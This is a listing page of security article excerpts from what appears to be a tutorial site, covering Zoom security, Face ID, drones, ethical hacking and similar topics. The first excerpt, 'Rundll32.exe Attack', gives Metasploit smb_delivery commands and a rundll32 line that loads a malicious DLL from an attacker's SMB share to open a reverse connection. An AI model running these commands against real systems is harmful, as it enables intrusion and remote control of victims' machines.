Safe & Security Articles

Page 86 of 88

Rundll32.exe Attack

Ajay yadav
Ajay yadav
Updated on 23-Sep-2020 710 Views

Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \192.168.1.109\vabFG\test.dll, 0

Read More

How can management ensure working women’s safety on their premises?

Rashmi Iyer
Rashmi Iyer
Updated on 27-Jun-2020 237 Views

Women in today’s world are taking major positions in different sectors and are performing extraordinarily well in their work roles. The contribution of women is extremely crucial for the inclusive economic development of the country. The principle of Gender Equality is enshrined in our constitution and the feminist movement in the late 1970s strengthened the concept. If we want women to succeed in their work lives, it is important to create a safe atmosphere for a woman to give a holistic contribution. Let's know how:Infrastructure FacilitiesIt is extremely important to keep the infrastructure facilities extremely strong in any workplace. Proper ...

Read More

How will drones help improve the security?

Dev Kumar
Dev Kumar
Updated on 26-Jun-2020 165 Views

Proper security involves all-around surveillance or observation of people, their behavior and actions, immovable property like land and building as well as movable property stationed there. Surveillance is generally conducted with the help of methods that either have limited mobility or are stationary like, CCTV cameras, GPS tracking dependent on satellite connectivity and not helpful in close observation, stake-outs, which are time-consuming, data-based profiling and biometrics and some other methods.Drone Has Turned the TableAll these methods have their own level of advantages and limitations but when it comes to drone technology, the efficiency, and effectiveness of any security operation increase ...

Read More

How to Secure ZOOM application

Ajay yadav
Ajay yadav
Updated on 20-Apr-2020 242 Views

This article poses a common advisory and security measure note for the Zoom users to protect themself from presumptive hacking attempt, as this application is quite vulnerable to breach. Zoom is quite trending and its popularity mysteriously skyrocket in last 3 month in terms of downloads (20 CR) despite having other plethora of amazing video conferencing application. Zoom does not have the End-to-end encryption facility like whatsapp and WebEx and attackers can potentially gain control to the ZOOM without its user’s cognizance by mean of a secret tools called zWarDial.However, I am not going to discuss the usage of this ...

Read More

Difference between Facial Recognition and Face ID

Mahesh Parahar
Mahesh Parahar
Updated on 15-Apr-2020 930 Views

Facial RecognitionFacial recognition is a technique in which a person is identified using his/her face. The system captures the facial expression details, analyzes and compares with an existing database of known faces to find a match. The face detection process helps to locate people in images and videos.Face IDFace ID is an advanced face recognition technology first unveiled in iPhone X. Face ID is very reliable and advanced biometric technology used in iPhones.The following are some of the important differences between Facial Recognition and Face ID.Sr. No.KeyFacial RecognitionFace ID1DefinitionFacial Recognition is a software application that is capable of verifying a ...

Read More

Windows UAC protection Bypass

Ajay yadav
Ajay yadav
Updated on 18-Mar-2020 423 Views

UAC (User account control ) is a windows IS security that enables a user to perform limited number of admin operations. Overall, it prevents normal users from performing specific actions that could pose a security risk to the system by requiring users to have admin-level permission. For security reasons enabling UAC to detect application installations and prompt for elevation to prevent regular user accounts from installing unauthorized software on clients is a best practice within Windows OS environments.In this tutorial, we shall investigate how to elevate the admin-level right from the end of a normal logged-in user by bypassing UAC ...

Read More

Cyber Attack Symptoms

Ajay yadav
Ajay yadav
Updated on 18-Mar-2020 359 Views

If we think an advance level of anti-virus has been installed on our computer, and we are fully secure as it performs a full system threat infection scan regularly. However, there may be instances where the scan did not detect any threat, or you cannot perform a scan. In these scenarios, we recommend that to notice the aggressive methods or symptoms to detect threats or attack.If it has been noticed an unwarranted presence of PowerShell in the task manager then our computer is definitely under attack.If a connection found to be established on port 4444 or 445 without your cognizance ...

Read More

Difference between Cyber Security and Information Security

Mahesh Parahar
Mahesh Parahar
Updated on 24-Feb-2020 1K+ Views

Cyber Security and Information Security both terms are synonymous with each other the difference between the two comes when nature of data which is going to secure. In nutshell Cyber security deals with protecting networks, computers, and data from unauthorized electronic access while Information security deals with protecting information assets regardless of whether the information is in physical or digital format.Data security is all about securing data. But there is difference between data and information. Not every data can be information. Data can be called as information when it is interpreted in a context and given meaning. For example, “14041989″ ...

Read More

How Ethical Hacking is Helping IT Security?

Sharon Christine
Sharon Christine
Updated on 24-Jan-2020 276 Views

While hackers have been causing a lot of pains to enterprises, another community of hackers have also been finding out vulnerabilities in the IT systems, albeit with a different objective. Such hackers, known as ethical hackers, proactively identify IT system vulnerabilities by hacking into the systems. Ethical hackers are a boon to enterprises because they identify potential vulnerabilities without any malicious intent. Enterprises can fix the issues before hackers can exploit them. Ethical hackers are being increasingly recognized – reputed organizations have been paying bounties to ethical hackers to find security loopholes in their systems that are hitherto undetected.Who is ...

Read More

Fireball – The Virus Which Can Hijack Your Browser

Sharon Christine
Sharon Christine
Updated on 24-Jan-2020 574 Views

Beware of all the internet surfers; the Fireball virus is coming to compromise your security!! Your internet browser is at high risk, as the browser attacking nasty virus can take control of your browser and do whatever it want without your consent. It can even run malicious codes, download files and much more on your own machine without your knowledge.After the dangerous WannaCry Ransomware attack which gave sleepless nights to millions of people worldwide, now another dirty virus called as “Fireball” is on attacking spree to make its victims around the world. As per the latest reports, the Fireball malware ...

Read More
Showing 851–860 of 875 articles
Advertisements